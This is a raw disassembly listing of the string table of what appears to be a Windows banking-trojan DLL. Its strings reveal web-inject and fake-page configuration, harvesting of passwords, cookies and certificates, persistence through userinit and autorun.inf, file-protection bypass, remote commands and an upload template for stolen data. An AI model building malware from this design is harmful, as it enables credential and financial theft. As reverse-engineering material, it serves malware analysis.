aSet_url db 'set_url ',0 ; DATA XREF: sub_100015CE:loc_100017C0�o
align 4
; char Str2[]
Str2 db 'Internet Explorer_Server',0 ; DATA XREF: sub_10001D30+1F�o
align 10h
aIeframe db 'IEFrame',0 ; DATA XREF: .text:10001DAE�o
; char aIeframe_0[]
aIeframe_0 db 'IEFrame',0 ; DATA XREF: sub_10001DE0+75�o
; char String2[]
String2 db 'msctls_statusbar32',0 ; DATA XREF: sub_10001DE0:loc_10001E79�o
align 4
; char aEdit[]
aEdit db 'Edit',0 ; DATA XREF: sub_10001DE0:loc_10001EC8�o
align 4
; char aMsctls_statu_0[]
aMsctls_statu_0 db 'msctls_statusbar32',0 ; DATA XREF: sub_10001F5B+1F�o
align 10h
; char aEdit_0[]
aEdit_0 db 'Edit',0 ; DATA XREF: sub_10001F5B:loc_10001FCC�o
align 4
aIeframe_1 db 'IEFrame',0 ; DATA XREF: .text:10002079�o
; char SubKey[]
SubKey db 'SOFTWARE\Microsoft\Internet Account Manager\Accounts',0
; DATA XREF: sub_100020B5+2C�o
align 4
; char aOutlookExpress[]
aOutlookExpress db '----------Outlook Express record---------',0Ah,0
; DATA XREF: sub_100020B5+1A7�o
align 4
; char Format[]
Format db '%s = %ws',0Ah,0 ; DATA XREF: sub_100020B5+220�o
align 10h
; char aSS[]
aSS db '%s = %s',0Ah,0 ; DATA XREF: sub_100020B5+245�o
align 4
; char aSD[]
aSD db '%s = %d',0Ah,0 ; DATA XREF: sub_100020B5+2AF�o
align 4
; char aName[]
aName db 'Name',0 ; DATA XREF: sub_100020B5:loc_10002379�o
align 10h
; char aEmail[]
aEmail db 'Email',0 ; DATA XREF: sub_100020B5+2DD�o
align 4
; char aServer[]
aServer db 'Server',0 ; DATA XREF: sub_100020B5+2F6�o
align 10h
; char aPort[]
aPort db 'Port',0 ; DATA XREF: sub_100020B5+30F�o
align 4
; char aPsItem[]
aPsItem db '---------------PS item------------',0Ah,0 ; DATA XREF: sub_100020B5+35F�o
; char ProcName[]
ProcName db 'PStoreCreateInstance',0 ; DATA XREF: sub_100020B5+398�o
align 4
; char aItemnameWs[]
aItemnameWs db 'itemName = %ws',0Ah,0 ; DATA XREF: sub_100020B5+53A�o
; char aItemdataWs[]
aItemdataWs db 'itemData = %ws',0Ah,0 ; DATA XREF: sub_100020B5+5E4�o
; char aItemdataS[]
aItemdataS db 'itemData = %s',0Ah,0 ; DATA XREF: sub_100020B5+602�o
align 4
a0123456789abcd db '0123456789abcdef',0 ; DATA XREF: sub_10002881+6�o
align 4
; char asc_100227B8[]
asc_100227B8: ; DATA XREF: sub_1000291D+7D�o
unicode 0, <\>,0
aMs32clod_0 db 'ms32clod',0 ; DATA XREF: sub_1000291D:loc_10002A18�o
align 4
; char aCS_log[]
aCS_log db 'c:\%s.log',0 ; DATA XREF: sub_1000291D+100�o
align 4
; wchar_t aImageJpeg
aImageJpeg: ; DATA XREF: TimerFunc+10E�o
unicode 0, <image/jpeg>,0
align 4
; const WCHAR aSHs_D_tmp
aSHs_D_tmp: ; DATA XREF: TimerFunc+1CE�o
unicode 0, <%s%hs_%d.tmp>,0
align 4
; char aSS_0[]
aSS_0 db '%s%s',0 ; DATA XREF: TimerFunc+2F7�o
align 10h
; char aS__S_jpg[]
aS__S_jpg db '%s__%s.jpg',0 ; DATA XREF: TimerFunc+3B6�o
align 4
; char aMs32clod_1[]
aMs32clod_1 db 'ms32clod',0 ; DATA XREF: sub_10003460+4�o
align 4
; char LibFileName[]
LibFileName db 'OLEACC.DLL',0 ; DATA XREF: sub_10003645+10�o
align 4
; char aWm_html_getobj[]
aWm_html_getobj db 'WM_HTML_GETOBJECT',0 ; DATA XREF: sub_10003645+32�o
align 4
; char aObjectfromlres[]
aObjectfromlres db 'ObjectFromLresult',0 ; DATA XREF: sub_10003645:loc_100036B5�o
align 4
a626fc520A41e11: ; DATA XREF: sub_10003645+A4�o
unicode 0, <{626fc520-a41e-11cf-a731-00a0c9082637}>,0
align 4
; char asc_100228AC[]
asc_100228AC: ; DATA XREF: sub_10003786+11E�o
unicode 0, <,>,0
; char asc_100228B0[]
asc_100228B0: ; DATA XREF: sub_10003786+159�o
unicode 0, <,>,0
; char asc_100228B4[]
asc_100228B4: ; DATA XREF: sub_10003786+191�o
unicode 0, <,>,0
; char MultiByteStr[]
MultiByteStr db 'password',0 ; DATA XREF: sub_10003786:loc_10003B9E�o
align 4
; char aText[]
aText db 'text',0 ; DATA XREF: sub_10003786+42C�o
align 4
; char aHidden[]
aHidden db 'hidden',0 ; DATA XREF: sub_10003786+440�o
align 4
; char aSubmit[]
aSubmit db 'submit',0 ; DATA XREF: sub_10003786+454�o
align 4
; char aButton[]
aButton db 'button',0 ; DATA XREF: sub_10003786+468�o
align 4
; char aImage[]
aImage db 'image',0 ; DATA XREF: sub_10003786+47C�o
align 4
; char asc_100228EC[]
asc_100228EC: ; DATA XREF: sub_10003786+E20�o
unicode 0, <=>,0
; char asc_100228F0[]
asc_100228F0: ; DATA XREF: sub_10003786+F54�o
unicode 0, <l>,0
; char aD[]
aD: ; DATA XREF: sub_10003786:loc_1000475A�o
unicode 0, <d>,0
; char asc_100228F8[]
asc_100228F8 db 0Dh,0Ah,0 ; DATA XREF: sub_10003786:loc_100047DF�o
align 4
; char aInternetExpl_0[]
aInternetExpl_0 db 'Internet Explorer_Server',0 ; DATA XREF: sub_10004960+6B�o
align 4
aInternetExpl_1 db 'Internet Explorer_Server',0 ; DATA XREF: .text:10004C3E�o
align 4
; char aHttp[]
aHttp db 'http://',0 ; DATA XREF: sub_100050D9+C0�o
; char asc_1002293C[]
asc_1002293C db '://',0 ; DATA XREF: sub_100050D9+D7�o
; char aD_0[]
aD_0 db '%d',0 ; DATA XREF: sub_100050D9+240�o
align 4
; char aMs32clod_2[]
aMs32clod_2 db 'ms32clod',0 ; DATA XREF: sub_1000537C+15D�o
align 10h
; char aMs32clod_3[]
aMs32clod_3 db 'ms32clod',0 ; DATA XREF: sub_1000537C+1A0�o
align 4
; char aSfc_os_dll[]
aSfc_os_dll db 'sfc_os.dll',0 ; DATA XREF: sub_1000559C+25�o
align 4
; char asc_10022968[]
asc_10022968 db '**',0 ; DATA XREF: sub_100055F0:loc_100056BE�o
align 4
; char Name[]
Name db 'SeShutdownPrivilege',0 ; DATA XREF: sub_1000579B+1D�o
aSS_1 db '%s\%s',0 ; DATA XREF: .text:10005853�o
align 4
a83f89d33c040a3 db '83f89d****33c040a3',0 ; DATA XREF: .text:loc_10005915�o
align 4
a83f89d8bc6a3 db '83f89d****8bc6a3',0 ; DATA XREF: .text:loc_1000595B�o
align 10h
aSfc_os_ db 'sfc_os.',0 ; DATA XREF: .text:loc_10005994�o
a83f89d33c040_0 db '83f89d****33c040a3',0 ; DATA XREF: .text:100059B1�o
align 4
a83f89d8bc6a3_0 db '83f89d****8bc6a3',0 ; DATA XREF: .text:loc_100059FD�o
align 10h
a838dFfff20 db '838d****ffff20',0 ; DATA XREF: .text:loc_10005A3F�o
align 10h
a834d20 db '834D**20',0 ; DATA XREF: .text:loc_10005A8B�o
align 4
aSDllcacheS db '%s\dllcache\%s',0 ; DATA XREF: .text:10005AE0�o
align 4
a_tmp db '.tmp',0 ; DATA XREF: .text:10005B2A�o
align 4
aSS_2 db '%s\%s',0 ; DATA XREF: .text:10005B46�o
align 4
; char aGetSHttp1_0Acc[]
aGetSHttp1_0Acc db 'GET %s HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_10005E66+227�o
db 'Accept: */*',0Dh,0Ah
db 'Host: %s',0Dh,0Ah
db 'Cache-Control: no-cache',0Dh,0Ah,0
align 10h
; char asc_10022A60[]
asc_10022A60 db 0Dh,0Ah,0 ; DATA XREF: sub_10005E66:loc_100060B5�o
align 4
; char aHttp1_1200Ok[]
aHttp1_1200Ok db 'HTTP/1.1 200 OK',0 ; DATA XREF: sub_10005E66:loc_10006207�o
; char asc_10022A74[]
asc_10022A74 db 0Dh,0Ah ; DATA XREF: sub_10005E66+3BE�o
db 0Dh,0Ah,0
align 4
; char aContentLength[]
aContentLength db 'Content-Length: ',0 ; DATA XREF: sub_10005E66+3D9�o
align 10h
; char asc_10022A90[]
asc_10022A90 db 0Dh,0Ah,0 ; DATA XREF: sub_10005E66+400�o
align 4
; char aS[]
aS db '---------------------------%s',0 ; DATA XREF: StartAddress+18F�o
align 4
; char aSContentDispos[]
aSContentDispos db '--%s',0Dh,0Ah ; DATA XREF: StartAddress+3A3�o
db 'Content-Disposition: form-data; name="userfile"; filename="%s"',0Dh,0Ah
db 'Content-Type: application/octet-stream',0Dh,0Ah
db 'Content-Transfer-Encoding: binary',0Dh,0Ah
db 0Dh,0Ah,0
; char aS_0[]
aS_0 db 0Dh,0Ah ; DATA XREF: StartAddress+3BC�o
db '--%s--',0Dh,0Ah,0
align 4
; char aPostSHttp1_1Ac[]
aPostSHttp1_1Ac db 'POST %s HTTP/1.1',0Dh,0Ah ; DATA XREF: StartAddress+47F�o
db 'Accept: */*',0Dh,0Ah
db 'Content-Type: multipart/form-data; boundary=%s',0Dh,0Ah
db 'Host: %s',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 'Connection: Keep-Alive',0Dh,0Ah
db 'Cache-Control: no-cache',0Dh,0Ah
db 0Dh,0Ah,0
align 4
; char asc_10022BF8[]
asc_10022BF8 db 0Dh,0Ah ; DATA XREF: StartAddress:loc_10006C17�o
db 0Dh,0Ah,0
align 10h
; char aMs32clod_4[]
aMs32clod_4 db 'ms32clod',0 ; DATA XREF: StartAddress+72B�o
align 4
; char asc_10022C0C[]
asc_10022C0C db 0Dh,0Ah ; DATA XREF: StartAddress:loc_10006D5D�o
db 0Dh,0Ah,0
align 4
; char a_[]
a_: ; DATA XREF: sub_10006FD3+5E�o
unicode 0, <.>,0
; char a__0[]
a__0: ; DATA XREF: sub_10006FD3+7C�o
unicode 0, <.>,0
; char aS_[]
aS_ db '%s\*.*',0 ; DATA XREF: sub_100071C0+22�o
align 4
; char a__1[]
a__1: ; DATA XREF: sub_100071C0+8A�o
unicode 0, <.>,0
; char a__[]
a__ db '..',0 ; DATA XREF: sub_100071C0+A4�o
align 4
; char aSS_3[]
aSS_3 db '%s\%s',0 ; DATA XREF: sub_100071C0+FA�o
align 4
; char aSS_4[]
aSS_4 db '%s\%s',0 ; DATA XREF: sub_100071C0+209�o
align 4
; char aS__0[]
aS__0 db '%s\*.*',0 ; DATA XREF: sub_1000741F+7E�o
align 4
; char a__2[]
a__2: ; DATA XREF: sub_1000741F+DE�o
unicode 0, <.>,0
; char a___0[]
a___0 db '..',0 ; DATA XREF: sub_1000741F+F8�o
align 4
; char aSS_5[]
aSS_5 db '%s\%s',0 ; DATA XREF: sub_1000741F+14E�o
align 4
; char aSS_6[]
aSS_6 db '%s\%s',0 ; DATA XREF: sub_1000741F+202�o
align 4
; char aS[]
aS__S db '%s__%s',0 ; DATA XREF: sub_1000741F+30E�o
align 4
; char a_sol[]
a_sol db '.sol',0 ; DATA XREF: sub_1000741F+330�o
align 4
; char aS__SS[]
aS__SS db '%s__%s&&%s',0 ; DATA XREF: sub_1000741F+35C�o
align 4
asc_10022C78 db 0Dh,0Ah,0 ; DATA XREF: sub_1000741F+440�o
align 4
; char aS__S_file[]
aS__S_file db '%s__%s.file',0 ; DATA XREF: sub_1000741F+563�o
; char a_sol_0[]
a_sol_0 db '.sol',0 ; DATA XREF: sub_1000741F+585�o
align 10h
; char aS__SS_0[]
aS__SS_0 db '%s__%s&&%s',0 ; DATA XREF: sub_1000741F+5B1�o
align 4
asc_10022C9C db 0Dh,0Ah,0 ; DATA XREF: sub_1000741F+697�o
align 10h
; char aS__1[]
aS__1 db '%s\*.*',0 ; DATA XREF: sub_10007B34+4B�o
align 4
; char a__3[]
a__3: ; DATA XREF: sub_10007B34+B3�o
unicode 0, <.>,0
; char a___1[]
a___1 db '..',0 ; DATA XREF: sub_10007B34+CD�o
align 10h
; char aSS_7[]
aSS_7 db '%s\%s',0 ; DATA XREF: sub_10007B34+123�o
align 4
; char aSS_8[]
aSS_8 db '%s\%s',0 ; DATA XREF: sub_10007B34+1C9�o
align 10h
; char aS__S_0[]
aS__S_0 db '%s__%s',0 ; DATA XREF: sub_10007B34+2D4�o
align 4
; char a_sol_1[]
a_sol_1 db '.sol',0 ; DATA XREF: sub_10007B34+2F5�o
align 10h
; char aS__SS_1[]
aS__SS_1 db '%s__%s&&%s',0 ; DATA XREF: sub_10007B34+321�o
align 4
; char aSHlst_tmp[]
aSHlst_tmp db '%s\hlst.tmp',0 ; DATA XREF: sub_10007B34+3B6�o
asc_10022CE8 db 0Dh,0Ah,0 ; DATA XREF: sub_10007B34+438�o
align 4
; char aS__S_1[]
aS__S_1 db '%s__%s',0 ; DATA XREF: sub_10007B34+565�o
align 4
; char a_sol_2[]
a_sol_2 db '.sol',0 ; DATA XREF: sub_10007B34+586�o
align 4
; char aS__SS_2[]
aS__SS_2 db '%s__%s&&%s',0 ; DATA XREF: sub_10007B34+5B2�o
align 4
; char aSHlst_tmp_0[]
aSHlst_tmp_0 db '%s\hlst.tmp',0 ; DATA XREF: sub_10007B34+647�o
asc_10022D14 db 0Dh,0Ah,0 ; DATA XREF: sub_10007B34+6C9�o
align 4
; char aMs32clod_5[]
aMs32clod_5 db 'ms32clod',0 ; DATA XREF: sub_1000878F+45�o
align 4
; char aConfig[]
aConfig db 'config',0 ; DATA XREF: sub_1000878F+9C�o
align 4
aNotifyes db 'notifyes',0 ; DATA XREF: sub_1000878F+FA�o
align 4
aNotify db 'notify',0 ; DATA XREF: sub_1000878F+142�o
align 10h
aUrl db 'url',0 ; DATA XREF: sub_1000878F+1A4�o
aNotify_0 db 'notify',0 ; DATA XREF: sub_1000878F+1AD�o
align 4
aThreadmasks db 'threadmasks',0 ; DATA XREF: sub_1000878F+200�o
aThreadmask db 'threadmask',0 ; DATA XREF: sub_1000878F+248�o
align 4
aMask db 'mask',0 ; DATA XREF: sub_1000878F+2AA�o
align 4
aThreadmask_0 db 'threadmask',0 ; DATA XREF: sub_1000878F+2B3�o
align 4
aWhat db 'what',0 ; DATA XREF: sub_1000878F+2FF�o
align 10h
aThreadmask_1 db 'threadmask',0 ; DATA XREF: sub_1000878F+308�o
align 4
aReplaces db 'replaces',0 ; DATA XREF: sub_1000878F+35B�o
align 4
aReplace db 'replace',0 ; DATA XREF: sub_1000878F+3A3�o
aItem db 'item',0 ; DATA XREF: sub_1000878F+405�o
align 4
aReplace_0 db 'replace',0 ; DATA XREF: sub_1000878F+40E�o
aWhat_0 db 'what',0 ; DATA XREF: sub_1000878F+45A�o
align 4
aReplace_1 db 'replace',0 ; DATA XREF: sub_1000878F+463�o
aInjects db 'injects',0 ; DATA XREF: sub_1000878F+4B6�o
aInject db 'inject',0 ; DATA XREF: sub_1000878F+4FE�o
align 10h
aUrl_0 db 'url',0 ; DATA XREF: sub_1000878F+560�o
aInject_0 db 'inject',0 ; DATA XREF: sub_1000878F+569�o
align 4
aBefore db 'before',0 ; DATA XREF: sub_1000878F+5B5�o
align 4
aInject_1 db 'inject',0 ; DATA XREF: sub_1000878F+5BE�o
align 4
aWhat_1 db 'what',0 ; DATA XREF: sub_1000878F+60C�o
align 4
aInject_2 db 'inject',0 ; DATA XREF: sub_1000878F+615�o
align 4
aBlock db 'block',0 ; DATA XREF: sub_1000878F+663�o
align 4
aInject_3 db 'inject',0 ; DATA XREF: sub_1000878F+66C�o
align 4
aCheck db 'check',0 ; DATA XREF: sub_1000878F+6BA�o
align 4
aInject_4 db 'inject',0 ; DATA XREF: sub_1000878F+6C3�o
align 4
aQuan db 'quan',0 ; DATA XREF: sub_1000878F+711�o
align 4
aInject_5 db 'inject',0 ; DATA XREF: sub_1000878F+71A�o
align 4
aContent db 'content',0 ; DATA XREF: sub_1000878F+768�o
aInject_6 db 'inject',0 ; DATA XREF: sub_1000878F+771�o
align 4
aT: ; DATA XREF: sub_1000878F+7BF�o
unicode 0, <t>,0
aInject_7 db 'inject',0 ; DATA XREF: sub_1000878F+7C8�o
align 4
aType db 'type',0 ; DATA XREF: sub_1000878F+816�o
align 10h
aInject_8 db 'inject',0 ; DATA XREF: sub_1000878F+81F�o
align 4
aNotify_1 db 'notify',0 ; DATA XREF: sub_1000878F+86D�o
align 10h
aInject_9 db 'inject',0 ; DATA XREF: sub_1000878F+876�o
align 4
aGlobal db 'global',0 ; DATA XREF: sub_1000878F+8C9�o
align 10h
aTime db 'time',0 ; DATA XREF: sub_1000878F+917�o
align 4
aTest db 'test',0 ; DATA XREF: sub_1000878F+963�o
align 10h
aFeeds db 'feeds',0 ; DATA XREF: sub_1000878F+9B8�o
align 4
aFeed db 'feed',0 ; DATA XREF: sub_1000878F+A00�o
align 10h
aUrl_1 db 'url',0 ; DATA XREF: sub_1000878F+A32�o
aFeed_0 db 'feed',0 ; DATA XREF: sub_1000878F+A3B�o
align 4
aFps db 'fps',0 ; DATA XREF: sub_1000878F+A85�o
aFp db 'fp',0 ; DATA XREF: sub_1000878F+ACD�o
align 4
aFp_0 db 'fp',0 ; DATA XREF: sub_1000878F+B05�o
align 4
aHlsts db 'hlsts',0 ; DATA XREF: sub_1000878F+B4F�o
align 10h
aHlst db 'hlst',0 ; DATA XREF: sub_1000878F+B97�o
align 4
aHlst_0 db 'hlst',0 ; DATA XREF: sub_1000878F+BCF�o
align 10h
; char aC[]
aC db '%c:\',0 ; DATA XREF: sub_1000878F+DD9�o
align 4
; char aC?[]
aC? db '%c:?',0 ; DATA XREF: sub_1000878F+E1B�o
align 10h
aLimits db 'limits',0 ; DATA XREF: sub_1000878F+E88�o
align 4
aNum db 'num',0 ; DATA XREF: sub_1000878F+EF4�o
aInject_10 db 'inject',0 ; DATA XREF: sub_1000878F+EFB�o
align 4
aRep db 'rep',0 ; DATA XREF: sub_1000878F+F3F�o
aInject_11 db 'inject',0 ; DATA XREF: sub_1000878F+F46�o
align 10h
aNum_0 db 'num',0 ; DATA XREF: sub_1000878F+FAD�o
aScsh db 'scsh',0 ; DATA XREF: sub_1000878F+FB4�o
align 4
aRep_0 db 'rep',0 ; DATA XREF: sub_1000878F+FF6�o
aScsh_0 db 'scsh',0 ; DATA XREF: sub_1000878F+FFD�o
align 4
aNum_1 db 'num',0 ; DATA XREF: sub_1000878F+1065�o
aGp db 'gp',0 ; DATA XREF: sub_1000878F+106C�o
align 10h
aRep_1 db 'rep',0 ; DATA XREF: sub_1000878F+10AE�o
aGp_0 db 'gp',0 ; DATA XREF: sub_1000878F+10B5�o
align 4
aFakes db 'fakes',0 ; DATA XREF: sub_1000878F+10FA�o
align 10h
aFake db 'fake',0 ; DATA XREF: sub_1000878F+1142�o
align 4
aUrl_2 db 'url',0 ; DATA XREF: sub_1000878F+11A4�o
aFake_0 db 'fake',0 ; DATA XREF: sub_1000878F+11AD�o
align 4
aParam db 'param',0 ; DATA XREF: sub_1000878F+11F9�o
align 4
aFake_1 db 'fake',0 ; DATA XREF: sub_1000878F+1202�o
align 4
aItem1 db 'item1',0 ; DATA XREF: sub_1000878F+1250�o
align 4
aFake_2 db 'fake',0 ; DATA XREF: sub_1000878F+1259�o
align 4
aItem2 db 'item2',0 ; DATA XREF: sub_1000878F+12A7�o
align 4
aFake_3 db 'fake',0 ; DATA XREF: sub_1000878F+12B0�o
align 4
aType_0 db 'type',0 ; DATA XREF: sub_1000878F+12FE�o
align 4
aFake_4 db 'fake',0 ; DATA XREF: sub_1000878F+1307�o
align 4
aRtype db 'rtype',0 ; DATA XREF: sub_1000878F+1355�o
align 4
aFake_5 db 'fake',0 ; DATA XREF: sub_1000878F+135E�o
align 4
aScshs db 'scshs',0 ; DATA XREF: sub_1000878F+13B1�o
align 4
aScsh_1 db 'scsh',0 ; DATA XREF: sub_1000878F+13F9�o
align 4
aUrl_3 db 'url',0 ; DATA XREF: sub_1000878F+145B�o
aScsh_2 db 'scsh',0 ; DATA XREF: sub_1000878F+1464�o
align 10h
aParam_0 db 'param',0 ; DATA XREF: sub_1000878F+14B0�o
align 4
aScsh_3 db 'scsh',0 ; DATA XREF: sub_1000878F+14B9�o
align 10h
aMultiscshs db 'multiscshs',0 ; DATA XREF: sub_1000878F+150C�o
align 4
aMultiscsh db 'multiscsh',0 ; DATA XREF: sub_1000878F+1554�o
align 4
aUrl_4 db 'url',0 ; DATA XREF: sub_1000878F+15B6�o
aMultiscsh_0 db 'multiscsh',0 ; DATA XREF: sub_1000878F+15BF�o
align 4
aParam_1 db 'param',0 ; DATA XREF: sub_1000878F+160B�o
align 10h
aMultiscsh_1 db 'multiscsh',0 ; DATA XREF: sub_1000878F+1614�o
align 4
aGfs db 'gfs',0 ; DATA XREF: sub_1000878F+1667�o
aGf db 'gf',0 ; DATA XREF: sub_1000878F+16AF�o
align 4
aUrl_5 db 'url',0 ; DATA XREF: sub_1000878F+1711�o
aGf_0 db 'gf',0 ; DATA XREF: sub_1000878F+171A�o
align 4
aParam_2 db 'param',0 ; DATA XREF: sub_1000878F+1766�o
align 4
aGf_1 db 'gf',0 ; DATA XREF: sub_1000878F+176F�o
align 4
; char aSS_9[]
aSS_9 db '%s%s',0 ; DATA XREF: sub_10009FE2+5D�o
align 10h
; char aSS_10[]
aSS_10 db '%s%s',0 ; DATA XREF: sub_10009FE2+1EA�o
align 4
; char aS___all[]
aS___all db '%s__.all',0 ; DATA XREF: sub_10009FE2+2CE�o
align 4
; char aS___log[]
aS___log db '%s__.log',0 ; DATA XREF: sub_10009FE2+2F7�o
align 10h
; char asc_10023030[]
asc_10023030: ; DATA XREF: sub_1000A318+AD�o
unicode 0, <\>,0
; char aMs32clod_6[]
aMs32clod_6 db 'ms32clod',0 ; DATA XREF: sub_1000A318+104�o
align 10h
; char aCommands[]
aCommands db 'commands',0 ; DATA XREF: sub_1000A318+174�o
align 4
aCommand db 'command',0 ; DATA XREF: sub_1000A318:loc_1000A4EB�o
aCommand_0 db 'command',0 ; DATA XREF: sub_1000A318+227�o
aCmd db 'cmd',0 ; DATA XREF: sub_1000A318+220�o
aCommand_1 db 'command',0 ; DATA XREF: sub_1000A318+285�o
aParam1 db 'param1',0 ; DATA XREF: sub_1000A318+27E�o
align 10h
aCommand_2 db 'command',0 ; DATA XREF: sub_1000A318+2E0�o
aParam2 db 'param2',0 ; DATA XREF: sub_1000A318+2D9�o
align 10h
aCommand_3 db 'command',0 ; DATA XREF: sub_1000A318+339�o
; char aHst[]
aHst db 'hst',0 ; DATA XREF: sub_1000A318+396�o
asc_1002308C db 0Dh,0Ah,0 ; DATA XREF: sub_1000A318+442�o
align 10h
asc_10023090 db ' ',0 ; DATA XREF: sub_1000A318+484�o
; char aGet[]
aGet db 'get',0 ; DATA XREF: sub_1000A318:loc_1000A802�o
; char aRun[]
aRun db 'run',0 ; DATA XREF: sub_1000A318+50A�o
; char aMs32clod_7[]
aMs32clod_7 db 'ms32clod',0 ; DATA XREF: sub_1000A318+53C�o
align 4
; char aRun_0[]
aRun_0 db 'run',0 ; DATA XREF: sub_1000A318:loc_1000A8FF�o
; char aShell32[]
aShell32 db 'shell32',0 ; DATA XREF: sub_1000A318+607�o
; char aExport[]
aExport db 'export',0 ; DATA XREF: sub_1000A318:loc_1000A973�o
align 10h
; char a_pfx[]
a_pfx db '.pfx',0 ; DATA XREF: sub_1000A318+692�o
align 4
aMy: ; DATA XREF: sub_1000A318+6AE�o
unicode 0, <MY>,0
align 10h
; char aSS_11[]
aSS_11 db '%s%s',0 ; DATA XREF: sub_1000A318+710�o
align 4
; char aReset[]
aReset db 'reset',0 ; DATA XREF: sub_1000A318:loc_1000AA7C�o
align 10h
; char ValueName[]
ValueName: ; DATA XREF: sub_1000A318+7C4�o
unicode 0, <f>,0
; char aU[]
aU: ; DATA XREF: sub_1000A318+7D6�o
unicode 0, <u>,0
; char aG[]
aG: ; DATA XREF: sub_1000A318+7E8�o
unicode 0, <g>,0
; char aS_1[]
aS_1: ; DATA XREF: sub_1000A318+7FA�o
unicode 0, <s>,0
; char aIl[]
aIl db 'il',0 ; DATA XREF: sub_1000A318+80C�o
align 4
; char aIln[]
aIln db 'iln',0 ; DATA XREF: sub_1000A318+81E�o
; char aGl[]
aGl db 'gl',0 ; DATA XREF: sub_1000A318+830�o
align 4
; char aKill[]
aKill db 'kill',0 ; DATA XREF: sub_1000A318:loc_1000AB67�o
align 4
; char aReboot[]
aReboot db 'reboot',0 ; DATA XREF: sub_1000A318:loc_1000AD03�o
align 4
; char aSelfk[]
aSelfk db 'selfk',0 ; DATA XREF: sub_1000A318:loc_1000AD28�o
align 4
; char aGrabf[]
aGrabf db 'grabf',0 ; DATA XREF: sub_1000A318:loc_1000AD6D�o
align 4
; char aHrdlst[]
aHrdlst db 'hrdlst',0 ; DATA XREF: sub_1000A318:loc_1000AE3D�o
align 4
asc_10023124: ; DATA XREF: sub_1000A318+BF2�o
unicode 0, < >,0
; char a20[]
a20 db '%20',0 ; DATA XREF: sub_1000A318+BF7�o
; char aSS_tmp[]
aSS_tmp db '%s\%s.tmp',0 ; DATA XREF: sub_1000B027+9F�o
align 4
; char aC_0[]
aC_0 db 'c:',0 ; DATA XREF: sub_1000B027:loc_1000B145�o
align 4
; char aSS_12[]
aSS_12 db '%s%s',0 ; DATA XREF: sub_1000B027+15A�o
align 4
; char aD_1[]
aD_1 db 'd:',0 ; DATA XREF: sub_1000B027+1DC�o
align 4
; char aSS_13[]
aSS_13 db '%s%s',0 ; DATA XREF: sub_1000B027+217�o
align 10h
; char aSS_14[]
aSS_14 db '%s%s',0 ; DATA XREF: sub_1000B027+30E�o
align 4
; char aS__S_lst_file[]
aS__S_lst_file db '%s__%s.lst.file',0 ; DATA XREF: sub_1000B027+42F�o
; char a1[]
a1: ; DATA XREF: sub_1000B027+4A4�o
unicode 0, <1>,0
; char aS_2[]
aS_2: ; DATA XREF: sub_1000B027+4A9�o
unicode 0, <s>,0
; char aSKernel32_dll[]
aSKernel32_dll db '%s\kernel32.dll',0 ; DATA XREF: sub_1000B536+79�o
; char aXXX[]
aXXX db '%x-%x-%x',0 ; DATA XREF: sub_1000B536+208�o
align 4
; char aD_S[]
aD_S db '%d_%s',0 ; DATA XREF: sub_1000B536+29C�o
align 4
; char aShell32_0[]
aShell32_0 db 'shell32',0 ; DATA XREF: sub_1000B7EF+C5�o
; char aShgetspecialfo[]
aShgetspecialfo db 'SHGetSpecialFolderPathA',0 ; DATA XREF: sub_1000B7EF+D3�o
; char aL00834_dat[]
aL00834_dat db '\l00834.dat',0 ; DATA XREF: sub_1000B7EF+1AE�o
; char asc_100231C0[]
asc_100231C0: ; DATA XREF: sub_1000B7EF:loc_1000BA9B�o
dw 0Ah
unicode 0, <>,0
; char aClose[]
aClose db 'close',0 ; DATA XREF: sub_1000B7EF+31C�o
align 4
; char aSl[]
aSl db 'sl',0 ; DATA XREF: sub_1000B7EF+36C�o
align 10h
; char aClose_0[]
aClose_0 db 'close',0 ; DATA XREF: sub_1000B7EF:loc_1000BBAD�o
align 4
; char aGl_0[]
aGl_0 db 'gl',0 ; DATA XREF: sub_1000B7EF+40F�o
align 4
; char aSuserinit_exe[]
aSuserinit_exe db '%suserinit.exe,',0 ; DATA XREF: sub_1000B7EF+535�o
; char aCopyfilea[]
aCopyfilea db 'CopyFileA',0 ; DATA XREF: sub_1000B7EF+5AC�o
align 4
; char aKernel32[]
aKernel32 db 'kernel32',0 ; DATA XREF: sub_1000B7EF+5B1�o
align 4
; char aC_1[]
aC_1 db '%c:\',0 ; DATA XREF: sub_1000B7EF+649�o
align 4
; char aSautorun_inf[]
aSautorun_inf db '%sautorun.inf',0 ; DATA XREF: sub_1000B7EF+685�o
align 4
aAutorunOpenBro db '[autorun]',0Dh,0Ah ; DATA XREF: sub_1000B7EF+6CE�o
db 'open=browser.exe',0Dh,0Ah,0
align 4
; char aBrowser_exe[]
aBrowser_exe db 'browser.exe',0 ; DATA XREF: sub_1000B7EF+71C�o
; char aMmd109en_dat[]
aMmd109en_dat db '\mmd109en.dat',0 ; DATA XREF: sub_1000B7EF+793�o
align 4
; char aSS_15[]
aSS_15 db '%s%s',0 ; DATA XREF: sub_1000B7EF+976�o
align 10h
; char aS__ps_txt[]
aS__ps_txt db '%s__PS.txt',0 ; DATA XREF: sub_1000B7EF+9FF�o
align 4
; char a_pfx_0[]
a_pfx_0 db '.pfx',0 ; DATA XREF: sub_1000B7EF+AA9�o
align 4
aMy_0: ; DATA XREF: sub_1000B7EF+AC4�o
unicode 0, <MY>,0
align 4
; char aSS_16[]
aSS_16 db '%s%s',0 ; DATA XREF: sub_1000B7EF+B33�o
align 4
; char aSS_17[]
aSS_17 db '%s%s',0 ; DATA XREF: sub_1000B7EF+BB2�o
align 4
; char aMed23ru17_tmp[]
aMed23ru17_tmp db 'med23ru17.tmp',0 ; DATA XREF: sub_1000B7EF+C2E�o
align 4
; char aSMacromedia[]
aSMacromedia db '%s\Macromedia',0 ; DATA XREF: sub_1000B7EF+C47�o
align 4
; char aSS_18[]
aSS_18 db '%s%s',0 ; DATA XREF: sub_1000B7EF+D67�o
align 4
; char aS__macromed[]
aS__macromed db '%s__macromed',0 ; DATA XREF: sub_1000B7EF+DEB�o
align 4
; char aCok458en_dat[]
aCok458en_dat db '\cok458en.dat',0 ; DATA XREF: sub_1000B7EF+EA4�o
align 4
; char aCok37qa93_tmp[]
aCok37qa93_tmp db 'cok37qa93.tmp',0 ; DATA XREF: sub_1000B7EF+F27�o
align 4
; char aSS_19[]
aSS_19 db '%s%s',0 ; DATA XREF: sub_1000B7EF+1095�o
align 4
; char aS__cookies[]
aS__cookies db '%s__cookies',0 ; DATA XREF: sub_1000B7EF+1119�o
; char aTimesNewRoman[]
